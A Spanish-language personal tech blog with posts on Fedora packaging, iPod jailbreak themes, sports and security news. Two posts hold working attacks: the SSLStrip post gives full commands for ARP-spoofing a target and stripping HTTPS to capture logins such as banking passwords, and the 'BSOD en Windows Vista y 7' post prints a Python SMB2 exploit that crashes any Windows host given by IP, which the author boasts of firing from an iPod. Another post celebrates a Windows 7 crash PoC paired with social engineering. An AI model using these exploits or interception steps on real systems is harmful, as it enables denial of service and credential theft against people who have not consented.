dcsDigitiser Graph Digitizer

Pues este es el segundo articulo de este blog de la etiqueta admonhack, esta etiqueta tendra todo lo relacionado de Administración utilizando la tecnología como apoyo para la solución de problemas, manejo de proyectos, etc., en pocas palabras Tecnología en servicio de administración.

Ahora poniendo en práctica lo anterior, me encontre con un caso en el cual un cliente nos envio información en forma de gráfica líneal (esos datos los necesitabamos en forma de tabla - a la administración -o sease en hoja de calculo). Por lo cual me dispuse a buscar un software que disponga de la capacidad de interpretar valores dentro de una gráfica a valores en forma de tabla.

Navegando un rato encontre dcsDigitiser, esta herramienta es muy sencilla de utilizar, solamente cargas la gráfica, le indicas donde estan los puntos X1, X2, Y1 y Y2, los puntos de la gráfica y listo, se obtiene una tabla de valores.



[dcsDigitiser]

iPod con acceso a correo Exchange

Despues de mucho tiempo de "batallar" con la configuración de mi iPod para poder accesar al correo Exchange pude lograrlo.
La configuración de este es muy sencilla pero en mi caso tuve que realizar algunos "tweaks" en el iPod para que funcionara:

- Your exchange must have access to ports 193 (unsecured) and 993 (Secured)
- IMAP must be enabled to be used amongst the user accounts. If not it won't work either.

Esto ultimo para servidores que tienen funcionando Exchange 2003.

En su iPhone/iPod van a Settings -> Mail, Con... -> Other.
Llenan todos los campos con la información de su servidor, seleccionan IMAP y llenan los campos con la información de su servidor, en el caso de SSL la opción es NO (si, ya se, pero es interno el correo :D).

En mi caso tuve que hacer un "hack" modificando el archivo hosts para agregar la IP estatica del servidor Exchange.

Saludos!

SuperKB 0.20

Buen día a todos,
Pues ya salio la versión 0.20 de superkb gracias a Octavio quien oficialmente me hizo "Package Maintainer" para los paquetes de Fedora.
- Aquí esta el blog de Octavio del release.
- Aquí esta la página oficial de Superkb.
- Aquí pueden bajar el source code y paquetes.

Enjoy!!

Farmville Auto Click

Ser un Farmville Addict no es fácil, requiere de esfuerzo y dedicación para tener tu Farm en buen estado, la flojera viene cuando tienes demasiados "cuadros" de sembradios y tienes que cosechar, arar y sembrar (clicks, clicks y mas clicks).
Para eso un programador con pseudonimo Sam creo una aplicación que se llama FarmVille Auto Click (FVAClick.exe).
Esta aplicación soluciona todos los problemas antes mencionados por que le indicas cuantos "cuadros" vas a dar click y lo hace automágicamente por ti por lo cual no más sufrimiento para las tareas diarias de FarmVille.
Screenshots



[Download]
Imagenes Obtenidas de aquí
Creditos: Para el Desarrollador de la aplicación.
Enjoy!!!

Superkb - Paquetes RPM y SRPM para Fedora 12

Despues de haber instalado Fedora 12 aka Constantine me di a la tarea de crear unos paquetes RPM y SRPM para el proyecto de mi amigo Octavio Alvarez - SuperKB.
Esta aplicación es sencilla y muy útil:

Superkb es un lanzador gráfico de programas para Linux. Funciona activándose al presionar una supertecla, normalmente Super_L o Super_R (mejor conocida como "la tecla de Windows"). Al activarse, presenta en pantalla un teclado con las teclas y sus correspondientes acciones.

Por ejemplo podemos configurar la Superkey + f para ejecutar Firefox.

Screenshot - Esta muy "crappy" por que todavia tengo que modificar el archivo de configuración a mi gusto.



Receta mágica para Fedora 12
1.- Deben de tener instalados los siguientes paquetes:

libnotify-0.4.5-3.fc12.i686
imlib2-1.4.2-5.fc12.i686
libXinerama-1.1-1.fc12.i686
libX11-1.3-1.fc12.i686
libX11-common-1.3-1.fc12.i686
libXft-2.1.13-4.fc12.i686

Haciendo esto:

#yum -y install libnotify imlib2 libXinerama libX11 libX11-common libXft

2.- Despues de eso bajan el RPM de la página de downloads de Superkb (Hay que esperar a que Octavio suba los RPMs).

3.- Lo instalan:
#rpm -Uvh superkb-0.17-1.fc12.noarch.rpm

4.- En /etc/superkb tendran unos archivos de configuración, de preferencia utilicen el que dice fedora.superkbrc -
Este lo van a guardar en un archivo .superkbrc en su directorio HOME. ie. $HOME/.superkbrc:

5.- Ejecutan desde su shell (o hacen un launcher) a superkb:

$superkb &

Listo, solo presionan (dejan presionada) la tecla Super_L (Windows Key Left) y veran las opciones, en este ejemplo si presionan Super_L+f se ejecutara Firefox.

Bueno, espero sea de ayuda.

UPDATE: Platicando con Octavio, va a liberar una nueva versión soportando Cairo, esperare esa versión para compilar de nuevo el RPM y SRPM y podamos subirlos en su sitio de SF. Se probo el RPM con un conejillo de indias y funciono sin problemas utilizando esta guia (bueno, si tiene problemas pero ya son de su configuración).

Saludos!

Upgrade from Fedora 11 to 12

Pues ya salio la versión 12 de Fedora AKA Constantine y no podia desaprovechar la oportunidad para actualizar mi Box.
Para realizar el Upgrade tuve que seguir los pasos de Upgrading Fedora using yum, una actualización que no necesito mucho trabajo, ya que a mi sistema lo trato de tener lo mas sano posible, solo hubo algunos paquetes que marcaron conflictos (2).
Lo que me gusto fue la advertencia:

Once a live upgrade is started do not stop the upgrade by rebooting, killing the process, or by any other method until it is complete, doing so will cause the affected system to be in a mixed state. Partially the old release and partially the new release. In this state the system will not be reliable and will not operate as expected. The only way to recover from this is to reinstall if it occurs.

O sea que si en el momento del "Live upgrade" pasaba algo con la conexion a Internet, Luz, etc. mi sistema podia quedar inoperable (yeah, Extreme Living!).
Saludos!

Windows 7 / Server 2008R2 Remote Kernel Crash

¿Recuerdan el exploit que provocaba un BSOD en Windows 7 de Laurent Gaffié?...
Si la respuesta es sí continuen leyendo, si es no, favor de ir aquí.
Pues nuestro amigo Laurent encontró otro fallo en SMB que afecta a Windows 7/ Server 2008 R2 con severidad de medium a high.
El impacto es que un atacante puede remotamente "tronar" cualquier Windows 7/Server 2008R2 dentro de la LAN o via IE (Internet Explorer).
NO hay patch por lo que se recomienda cerrar los puertos que usen SMB.
From Laurent...

"Most secure Os ever";
What ever your firewall is set to, you can get remotly smashed via IE or even via some broadcasting nbns tricks (no user interaction)
How funny.

[Blog de Laurent]

UPDATE: It works!, el PoC lo tienen que modificar un poco, una pizca de Ingenieria Social y listo!, la Windows Machine se Freezea!!! (Pwn3d!):

¿Microsoft Patenta Sudo?

DAMN!
Así empezamos es post, no soy "Microsoft hater" como algunas personas que usan Linux, yo uso ambos sistemas a diario, claro que tienen sus pros y sus contras pero al fin alcabo hacen lo que deben hacer.

Como el titulo de este post lo dice "¿Microsoft patenta sudo?", esta noticia la vi en Groklaw en donde describe una patente de Microsoft con numero 7,617,530 ingresada el 10 de noviembre de 2009 en la cual hace referencia a:

Systems and/or methods are described that enable a user to elevate his or her rights. In one embodiment, these systems and/or methods present a user interface identifying an account having a right to permit a task in response to the task being prohibited based on a user's current account not having that right.

Sistemas y/o metodos que permiten a un usuario elevar sus permisos.

O sea, NO ma#$%s...

Esta claro que estan describiendo a sudo y/o su, esto me hizo pensar en varias cuestiones, como lo mencione antes, no soy "Microsoft hater", pero en esta ocasión si se paso de ....

1.- ¿Le habra hecho daño a la comunidad que Microsoft se casara con Novell?
2.- ¿Microsoft esta "pirateandose" habilidades de GNU/Linux gracias a este "deal"?
- Will the REAL "NEW" in Windows 7 please stand up - TechRepublic
3.- ¿Seguira Microsoft ingresando patentes de sus "nuevos inventos" que saca de la comunidad de Software Libre y UNIX?
4.- ¿Algun día cobraran por x razón por aplicaciones hechas con MONO (uso, patentes, etc.)?
- Mono Tools for Visual Studio - By Icaza

Estas son algunas cuestiones que me he puesto a pensar, no tengo nada con la interoperabilidad de OSes, pero gandallearte con una patente creo que no es justo.

Let the Flame wars begin...

[GrokLaw Article]
Image by - xkcd

Graudit

Graudit es un script simple que te permite encontrar importantes fallas de seguridad en tu código.

Soporta escanear código de asp, jsp, perl, php y python.

Programmers denle una revisada.

[Sitio de Graudit]

SSL Strip

This tool provides a demonstration of the HTTPS stripping attacks presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Yeah!, un ejemplo básico es que puedes ver el username y password de una página de bancos como CapitolOne :S.

Las instrucciones siguientes seran para Fedora, ya que en la página oficial vienen para Debian based:

Python >= 2.4
yum -y install python

Python "twisted-web"
yum -y install python-twisted-web

Arpspoof
yum -y install dsniff

Setup
tar zxvf sslstrip-0.X.tar.gz
cd sslstrip-0.X
(optional) ./setup.py install

Forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward

Configuramos iptables para dirigir el tráfico HTTP a sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port [listenPort]

Ejecutamos sslstrip.
sslstrip.py -l [listenPort]

Ejecutamos arpspoof para que el tráfico sea enviado hacia nuestro equipo.
arpspoof -i [interface] -t [targetIP] [gatewayIP]

Listo, pueden abrir el archivo sslstrip.log para ver las capturas de trafico HTTPS.

Disclaimer: Este post es de cuestiones didacticas para conocer como un atacante puede aprovecharse de un acceso no autorizado a nuestra red y ver el tráfico que va destinado a HTTPS.

[Sitio de SSLStrip]

Members in Active Directory Group

Me vi en la necesidad de obtener una lista de usuarios de un grupo en AD en Win2003 Svr pero al quererlo hacer por medio de las herramientas administrativas no me daba el resultado deseado e inverti más tiempo de lo normal.

¿Qué fue lo que hice?

Tuve que recurrir al Command Prompt (Modo texto nunca se "raja").
Indagando un poco pude crear un pseudo vbs script:

On Error Resume Next

Const DOMAINGROUP = "LDAP://cn=grupo, cn=Users, dc=midominio,dc=com"
Const GROUPHEADER = "<-= GROUP grupo =->"
Const GROUPFOOTER = "====================="

doYourJob

openFile

Private Sub doYourJob()
Set objGroup = GetObject _
(DOMAINGROUP)
''objGroup.GetInfo

Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.CreateTextFile("members.txt", True)

file.Writeline GROUPHEADER

For each objMember in objGroup.Members
file.Writeline objMember.Name
Next
file.Writeline GROUPFOOTER
file.Close
End Sub

Private Sub openFile()
Const WIN_STYLE = 4
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "notepad.exe c:members.txt", WIN_STYLE
End Sub


Solo hay que hacer copy-paste y grabarlo con extensión vbs.

Saludos!

America + Chivas = 3D

Si, primera vez en la historia de la humanidad tecnologica se transmitira un partido en vivo en 3D! y los equipos a disputar dicho partido son nada mas y nada menos que las Aguilas del America y las Chivas del Guadalajara, Super Clasico, si, de nuevo, en 3D!!!!!
[Nota Periodistica]

Rapid7 adquiere Metasploit

Metasploit es el framework libre reconocido mundialmente para ejecutar exploits (hack da stuff!) que ha estado alrededor de 6 años en el ambito de la seguridad de tecnologias de información.

Este desarrollo que era solo de fin de semana o tiempo libre por parte de HD Moore y Egipt ahora sera de tiempo completo, pagado por Rapid7.

En horabuena, esperemos que Rapid7 sepa aprovechar el talento del equipo detras de Metasploit y este framework pueda crecer.

Anuncio Metasploit
Anuncio Rapid7

Prey - Recupera tu Laptop

Como esta escrito en el Sitio de la aplicación:

Prey es un pequeño programa que te ayudará a encontrar tu PC si algún día te lo roban.

Lo mejor de todo es que funciona en Windows/MacOs/Linux, es Open Source y Gratuito!

Prey puede darles esa esperanza de recuperar su laptop en caso de ser robada.

[Prey]

Mi nuevo iPod Theme

Pues el theme se llama TEKNOLOGIK, creado por dazcoates basado en el theme Whitoken.

La configuración puede ser un poco laboriosa, pero al final los resultados son muy buenos.

Primero hay que realizar la configuración como el theme Whitoken [How to].
Despues copiar el theme TEKNOLOGIK.

Asi es como va quedando, me faltan algunos iconos de la sección de Games:

Wireless Tools Windows OS

Despues de ver listas de correos y algo de tiempo navegando en Internet encontre un par de herramientas muy buenas para la verdadera auditoria de redes Wireless (no con aircrack).

La primera es HeatMapper, esta herramienta nos permite cargar un mapa para despues empezar a caminar por el area donde tenemos cobertura wireless trazando lineas por donde vayamos caminando, asi creamos un area de cobertura por cada access point.

La segunda es inSSIDer, es como el NetStumbler pero con esteroides, lo interesante es que tiene soporte nativo para la Wifi API de Windows.

Bueno, ahi las tienen, have fun!

Problemas con iPod Touch 2G + iPhoneBrowser

Pues si, realice el super upgrade de 3.0 a 3.1.2 del firmware del iPod con jailbreak incluido gracias a la lluv1a negra.

Ahora bien quise cambiar el theme de mi iPod pero me fue imposible ya que iPhoneBrowser no detecta el dispositivo con Jailbreak.

Esto se debe en la forma que realicé el Jailbreak (con lluv1a negra) ya que no se crea un servicio llamado afc2 que necesita tanto el iPhoneBrowser como DiskAid para poder desplegar el árbol del sistema de archivos.

Para agregar este servicio solamente hay de dos, manualmente o por medio de Cydia, esto segundo fue la forma en como lo realice, busque la aplicación afc2add de modmyi.com, la instale y listo!, ya puedo ver de nuevo el sistema de archivos.

Ahora a "pimpear" el iPod con un nuevo theme.

Assembly Language and SecurityTube

Revisando mis correos me encontre con una interesante discusión en la cual se preguntaba sobre un sitio para aprender lenguaje ensamblador, me llamo la atención una respuesta en la cual mencionan a SecurityTube, el cual es como un YouTube para personas que les interesa la seguridad en IT.

Dentro de esa respuesta se dio la siguiente lista de videos para aprender ensamblador:

1. System Organization Concepts:

http://tinyurl.com/ceq5fy

2. Virtual Memory Basics:

http://tinyurl.com/c7o956

3. GDB Primer:

http://tinyurl.com/cmsvfj

4. Coding your first Hello World program

http://tinyurl.com/dj9fgn

5. Data types in Assembly:

http://tinyurl.com/cs6cy4

6. Moving Data around in a program:

http://tinyurl.com/cmwv3r

7. Working with Strings::

http://tinyurl.com/dlav5f

8. Unconditional Branching techniques:

http://tinyurl.com/djthgy

9. Conditional Branching using the JMP family:

http://tinyurl.com/ce9npc

10. Functions in Assembly

http://tinyurl.com/cy8b9m

11. Understanding the Stack

http://tinyurl.com/dh72ow

Ahora para los que deseen aprender ensamblador, lets get it on!.

Gerix Wifi Cracker New Generation

¿Qué es Gerix Wifi Cracker NG?

Es un GUI para Aircrack-NG para atacar Access Points y Routers Wireless de una forma rápida y sencilla. Otra palabra que le gusta utilizar a un amigo en vez de atacar es auditar...

Esta herramienta esta escrita en Python y QT.

Como dicen en la página del proyecto:

with Gerix WIFI Cracker NG, EVEN MY GRANDMOTHER KNOWS HOW TO CRACK A WIRELESS NETWORK!

con Gerix WIFI Cracker NG, incluso mi abuela sabe como crackear una red wireless

Enjoy!
Página de Gerix

Flock - The Social Networking Partner

Pues indagando por ahi en el "Interné", encontre esta variación de nuestro navegador favorito Firefox, Flock.

¿Qué es flock?

Es una navegador que esta optimizado para tu vida social en Internet o sea Social Networking, viene integrado con Facebook, MySpace, Twitter, Youtube, Flickr, Gmail, etc.

Ahora ya puedes navegar y estar conectado al mismo tiempo con tus amigos en un solo navegador (Para esos adictos al Facebook).

Enjoy!

[Flock Download]

Garitas BC Versión 0.4

Asi es...

GaritasBC llega a su versión 0.4 teniendo unas mejoras muy buenas:

Ya esta disponible la información para Mexicali BC.
Se arreglo el menu de las camaras
Y se agregaron opciones (Para escoger entre Tijuana y Mexicali)
Tijuana tiene la información de Tecate.

Enjoy!

[Sitio del Addon]

Si pueden hagan su review para que pueda ser pública la extensión y los updates sean automáticos.

España, campeón de la EuroBasket

Pues si mis estimados lectores, soy basquetbolista y sigo muy de cerca lo que sucede en este deporte (al igual que el futbol).
Pues a España no le basto con ganar la Eurocopa 2008 de futbol soccer, ya que este fin de semana pasado ganaron la EuroBasket por primera vez en su historia gracias al MVP del partido Paul Gasol, actual jugador de los Lakers de los Angeles de la NBA (si, actuales campeones de la NBA, donde juega Kobe Bryant por cierto).
En horabuena para nuestros amigos españoles, se les ha dado muy bien en los deportes.

I love this Game!!!!!

Versión 0.3 de GaritasBC

Pues si, hoy dedique un rato a "embellecer" el addon, todavia esta un poco rustico, pero ya esta tomando forma.

Visiten el sitio del addon para descargar la nueva versión.

PD. Si pueden registrarse y realizar un review del addon se les agradecera, esto para que el addon pueda convertirse en público.

Saludos!

Oktober Fest

Yes!, la Asociacion Municipal de Ingeniebrios Ex Estudiantes de la Facultad de Ciencias Quimicas e Ingenieria de la Universidad Autonoma de Baja California Plantel Tijuana AC. esta planeando un Oktober Fest (Pisto!!!!).

Ahora solo estamos en espera de un alma caritativa que pueda permitir a esta asociación pisteadora reunirse y desenvolverse como siempre lo ha hecho...



Willkommen Ingenieure,

Da Oktober wurden zu trinken!!!!

GaritasBC - Addon para Firefox

El presente es para informarles que ya renacio un proyecto que traia enpolvado desde Firefox 1.0.x, la famosa extensión GaritasTJ, que este momento paso a ser GaritasBC.

n00b - ¿Isra, pero que hace esta extensión/addon?

Respuesta - Esta extensión se conecta a un sitio WEB donde esta la información de garitas, lo "parsea" y lo muestra en una forma amigable.

otro n00b - ¿Pero que es una Garita?

Respuesta - A grandes rasgos es el cruce fronterizo entre México y Estados Unidos.

Más información:

[Sitio del Addon]

Saludos!

BSOD en Windows Vista y 7

Si, un "Pantallazo Azul" ataca de nuevo a nuestro fabricante favorito de Software Microsoft.
Se acuerdan de aquel Ping of Death, pues esta falla es más divertida.

Tengo un poco de flojera, asi que posteare lo que encontre en la WEB:

Laurent Gaffié ha detectado un fallo de seguridad en Windows Vista que
podría permitir a un atacante provocar un BSOD (pantallazo azul, una
denegación de servicio) con solo enviar algunos paquetes de red
manipulados a una máquina que tenga activos los servicios de
compartición de archivos (protocolo SMB).

El fallo (incomprensiblemente simple) está en el intérprete de las
cabeceras SMB, concretamente en el driver srv2.sys. Como los
controladores operan en el "ring0", la capa de abstracción del sistema
operativo más cercana al hardware (en contraste con el "ring3", la capa
de usuario que no interactúa directamente con él) un fallo en cualquier
driver provoca que el sistema se bloquee por completo, al no poder
manejar la excepción correctamente. Se trata del temido pantallazo azul,
o BSOD. Los Windows anteriores a Windows 2000 no realizaban esta
separación de seguridad entre capas, por lo que todo operaba en el mismo
espacio de memoria y los fallos en el espacio de usuario podían causar
un bloqueo total del sistema. De ahí que los pantallazos azules fuesen
mucho más comunes en Windows 9x y Me.

El ataque es tan sencillo que recuerda a los "pings de la muerte" que
hicieron estragos a finales de los 90 en los sistemas Windows. Contenían
un fallo en la pila TCP que hacía que, si se enviaba un ping al sistema
especialmente manipulado (simplemente especificando con un parámetro,
por ejemplo, un tamaño mayor del paquete) se podía hacer que el sistema
dejara de responder. Esto, unido a la carencia de cortafuegos del
sistema, a que en aquellos momentos las conexiones se realizaban a
través de módem (que carecía de protección por cortafuegos o NAT) y el
hecho de no existir servicio de actualización automático del sistema,
hicieron muy popular el ataque.

Este fallo en el protocolo SMBv2 de compartición de archivos requiere
igualmente del envío de una sencilla secuencia de paquetes SMB (al
puerto 445) al sistema víctima con las cabeceras manipuladas. El truco
está en enviar un carácter "&" en el campo "Process Id High" de las
cabeceras SMBv2. Esto provoca una excepción en srv2.sys que provoca el
pantallazo azul. El exploit es público y realmente sencillo.

Vista mantiene el cortafuegos activo por defecto para su perfil
"público", y esto mitiga el problema. Pero todo depende del perfil. Si
el usuario usa un perfil de cortafuegos (ya sea de dominio, o el perfil
privado) en el que permite las conexiones a sus unidades compartidas
(puerto 445, normalmente abierto en las redes locales) será vulnerable.
No es necesario que comparta realmente una unidad, solo que el protocolo
SMB esté activo y preparado para compartir en su sistema. Esto puede
resultar especialmente grave en redes internas.

No existe parche oficial disponible. Se recomienda filtrar el puerto 445
(y los implicados también en la compartición de ficheros 137-139) a
través de cortafuegos. También es posible detener el servicio "Servidor"
del sistema (aunque se puede llegar a perder funcionalidad). Otra
contramedida posible es desactivar la casilla "compartir archivos e
impresoras" que aparece en las propiedades de las interfaces de red.

Aunque el ataque no permite ejecución de código y es poco viable que
pueda propagarse por la red pública, sí que puede resultar más que
molesto en redes internas donde los usuarios normalmente mantienen
reglas de cortafuegos mucho más relajadas.

Bueno, despues de tanto yara yara, consegui el código desde el sitio de Laurent, la persona que descubrio la vulnerabilidad; esta en Python y lo modifique un poco para poder poner cualquier IP:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep
import sys

host = sys.argv[1], 445
print 'Trying to Pwn ',host

buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()


Uso: smbbsod.py hostname

Pero para hacerlo más interesante (si, en veces entran los Geek Moments) instale Python en el iPod touch y desde ahi ejecute el script a un equipo remoto con Windows 7 :P, despues pongo una picture.

Fuentes:
Sitio de Laurent Gaffié
Hispasec

OfficeTab

El dia de hoy me encontre con esta utilería: OfficeTab, la cual te permite crear tabs (pestañas) en Word, Excel y Powerpoint de MS Office, la verdad muy útil si estas acostumbrado a utilizar los tabs y no tener tantas ventanas abiertas.



[Fuente]

Linux ya es mayor de edad (en México)

Si, Linux a cumplido sus 18 años de existencia, esto empezo como un hobbie por parte de Linus Torvalds, un geek como todos nosotros, quien decidio crear su propio Minix a su medida.
Todo empezo aquí, como hasta hoy a estado funcionado, compartiendo código con la comunidad y mejorandolo a su vez.
Linux un nucleo de sistema (kernel) que en conjunto con GNU (herramientas de código libre) han demostrado ser uno de los sistemas más estables (como Red Hat, el cual esta en la mayoria de los servidores configurados en cluster por grandes compañias para alto procesamiento y proporcionar servicios como el web).

No queda mas que decir en buena hora y que siga sumando más años de exito.

Happy Birthday Linux...

iPod Touch con aires de grandeza (HTC Hero)

El otra vez me toco utilizar un telefono HTC el que viene con el Windows Mobile 6.1, esta muy bien, un poco engañoso al momento de moverte a traves del menu pero muy buen telefono.
Ahora bien, la versión que viene con Android HTC Hero se ve muy bien y no se diga su interfaz de usuario (por lo cual me gusto mucho); simple y con buen diseño.
Pero en este momento no cash y ya tengo un iPod Touch con Jailbreak, ¿entonces?, solo era cuestion de tiempo para que saliera un theme de HTC Hero para el iPod y asi fue, el cual pueden bajarlo de esta página tanto para iPod Touch como para iPhone.
Solamente hay que seguir muy bien las instrucciones y veran que en menos de 5 minutos quedara como ustedes deseen.
Y este es el resultado final:

Ahora si, un iPod Touch en fancy mode.
Saludos!

I MAED A GAM3 W1TH Z0MB1ES!!!1 - Game

YES!, no, no escribi mal el nombre y si, si es un juego, esta en este momento a la venta en XBOX Live Marketplace a 80 puntos Microsoftianos, algo asi como un dolar.

El juego fue desarrollado por un Indie Programmer geek, nerd, psyco, etc., en el cual tu unica mision es ... adivinaron - Darle RIP a los Zombies. Aquí un video para que se entretengan.

Me recuerda al juego de MiniGore para el iPhone/iPod Touch.

Comic Con 09

Pues despues de unas merecidas vacaciones, regrese al "rancho" para asistir inmediatamente al Comic Con en San Diego donde los geeks pueden sentirse como en casa, desde disfrazarse como Dios les da a entender hasta hablar en otros lenguajes como el Klingon.

Fue divertido asistir, asi que si para el siguiente año espero ir de nuevo, eso si, con un colchonsito mas de $ para comprar lo que sea.

Feliz Día del Administrador de Sistemas (SysAdminDay)

Si, como todo mundo tiene su día que celebrar (estudiante, maestro, mama, papa, familia, etc.) no podia faltar el día del administrador de sistemas (SysadminDay).
Se festeja el último dia de julio que en este caso cayo en 31, dedicado a todas esas personas que día con día tienen que lidiar con los problemas tanto de hardware, software y la famosisima "capa 8" a.k.a. el usuario final.
Ok, hoy es su día, traten de relajarse, pero no mucho por que de seguro estan a punto de hablarles por telefono para revisar alguna falla :P.

Saludos a todos los SysAdmins!!!

SysAdminDay

20 Mandamientos de los SysAdmins

1. Do it the same, over and over and over again (Haz lo mismo una y otra y otra vez)

2. Backups are sacred! If you do not know if your backups are current, then test them by restoring the data and comparing. (¡Las copias de seguridad son sagradas! Si no sabes si tus copias de seguridad están al día, entonces pruébalas reestableciendo los datos y comparando)

3. Do not make many, tiny partitions, make a smaller number of larger partitions, instead. (No crees muchas pequeñas particiones, en su lugar trabaja con un número pequeño de particiones grandes)

4. Why change the system default when you don’t have to? (¿Por qué cambiar el sistema por defecto si no tienes necesidad?)

5. Think now so you don’t have to later (at 4am). (Piensa en el momento así no tendrás que hacerlo más tarde (4 de la mañana, por ejemplo) o nuestro equivalente en español no dejes para mañana lo que puedas hacer hoy)

6. If you have to do it more than once, automate it. If you cannot automate it, document it. (Si tienes que hacer tareas repetitivas, automatízalas. Si no puedes automatizarlas, busca documentación para hacerlo)

7. Personality is for people, not for computers. (La personalidad es para las personas, no para los ordenadores)

8. “Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it.” – Brian W. Kernighan (Depurar [código] es dos veces más duro que escribir el código. Por lo tanto, si escribes el código de la manera más inteligente posible, no eres, por definición, lo suficientemente inteligente para depurarlo)

9. If you do not know what a machine will do when it is rebooted, then it is not production ready. (Si no sabes qué hará una máquina cuando se reinicie es que no está lista para ser [una máquina] de producción)

10. Unless you write an essay on why you need to do something “special” use the tools, procedures, techniques and resources the OS provided for you. (A menos que vayas a escribir un ensayo sobre por qué una máquina necesita hacer algo especial utiliza las herramientas, procedimientos, técnicas y recursos que te proporciona el sistema operativo)

11. Remember the Mack Truck Scenario: If no one will be able to figure this out if you get hit by a Mack truck, then you’re doing something wrong. (Recuerda la escena del camión: Si nadie será capaz de comprender lo que pasa si te atropella un camión, entonces es que estás haciendo algo mal)

12. Revision Control! Comment! (¡[Utiliza] control de versiones! ¡[Añade] comentarios!)

13. Log and rotate logs. Log remotely for best effect. ([Genera] logs y rótalos. Para un mejor efecto genra logs en remoto)

14. Simplicity is its own reward. (La mejor recompensa es la sencillez)

15. If you haven’t thought of at least one potential negative outcome of hitting enter at the end of the command you just typed; then you don’t understand the command well enough to use it on a production system. (Si no has pensado al menos una vez en los incovenientes de pulsar la tecla Enter justo después de escribir el comando [en una consola], entonces no conoces suficientemente bien la línea de comandos como para utilizarla en una máquina de producción)

16. Use a unique marker for names of packages that are locally developed. $domainname perhaps? (Utiliza un marcador [fácilmente identificable] para todos los paquetes que se han desarrollado en la máquina local como, por ejemplo $nombrededominio)

17. If you cannot enumerate every port that should be listening on a given machine; then it is not production ready. (Si no puedes enumerar cada uno de los puertos que deberían estar a la escucha en una máquina determinada, entonces ese equipo no está listo para ser una máquina de producción)

18. If the host firewalling allows access to more ports than ABSOLUTELY necessary; then the host is not production ready. (Si el firewall del servidor permite el acceso a más puertos de los ABSOLUTAMENTE necesarios, entonces ese servidor no puede ser de producción)

19. If it seems like someone else would have encountered this problem before, they probably have. We do not live in a vacuum. Google for the answer (Si parece que alguien más ha encontrado antes un problema, probablemente es que así ha sido. No vivimos aislados del mundo. La respuesta está en Google)

20. DOCUMENT! (¡[Busca] documentación!

[Fusilado de aquí]

IronMan Anime

Yeah!, si, nuestros amigos de MadHouse en Japan estan realizando un anime sobre IronMan al puro estilo Japones (Duh!), digo, ellos tienen años haciendo robots tanto en dibujos animados como en vida real, creo que estan realizando un buen trabajo con este personaje.

[IronMan Anime - Video]

GRUB 2 en Ubuntu 9.10

Despues de regresar de vacaciones y poner en orden varios asuntos, por fin tengo la oportunidad de postear y que mejor postear algo interesante sobre nuestro Sistema favorito Linux.

Esta es una noticia para geeks!, muy buena, Ubuntu 9.10 va a venir con GRUB versión 2.

n00b dude: Isra, ¿Pero... que tiene de bueno?

Isra: Pues nada mas hay que ver lo que puede hacer GRUB 2 por nosotros:

Scripting

Con soporte de variables y con un buen "surtido" de comandos.

Rescue Mode (Modo de rescate)

Cuando el actual GRUB tiene problemas para "bootear" el sistema operativo, simplemente se congela, forzando al usuario a realizar un reseteo manual. Pero GRUB con sus nuevos superpoderes en la versión 2 abrira un command prompt donde los usuarios podran rescatar el sistema que en ese momento estara semi-booteado (yeah!).

Graphical Boot (Boot Gráfico)

GRUB 2 ya permitirá crear menus gráficos para el boot como estos dejando atras la fealdad del GRUB Legacy.

Boot ISO Images (Bootear Imagenes ISO)

Si!, GRUB 2 permitirá bootear desde imagenes ISO guardadas en el disco local, simplificando las cosas como el probar un nuevo Linux live CD grabando el iso en el disco y pasar los parametros a GRUB para bootearlo (YEAH!).

Ahora a esperar esta versión de la distro Ubuntu...

[Fuente - WorksWithU]

Carnotaurus

Despues de mucho tiempo de no hacer dibujos, tuve que aventarme uno para la exposición de mi hijo, el famoso Carnotaurus, dinosaurio que fue famoso por la pelicula de Dinosaurio de Walt Disney Feature Animation.



Saludos!

Resolución de nombres utilizando un servidor DNS especifico

Siguiendo con los "n00b tips", llego una pregunta en una lista de correo para realizar una resolución de nombres utilizando un servidor DNS en especifico (un vil lookup):

En *nix se pueden utilizar los siguientes comandos:

$  dig @[servidor DNS a realizar la petición] -x [Dirección IP] +short +norecurse

o

$ host -r [Dirección IP] [servidor DNS a realizar la petición]

Y listo con eso podran realizar una resolución de nombres desde el shell.

EXTRA: Winboys, pueden utilizar el siguiente comando:

C:\> nslookup -norecurse [Dirección IP] [servidor DNS a realizar la petición]

Saludos!

Instalar VMware Player en Fedora 11

Entrando de lleno ya con "Leonidas" (Fedora 11), la siguiente misión era instalar el VMware Player.

[more...]

Problemas con Yum en Fedora 11

Stop!... n00b time.

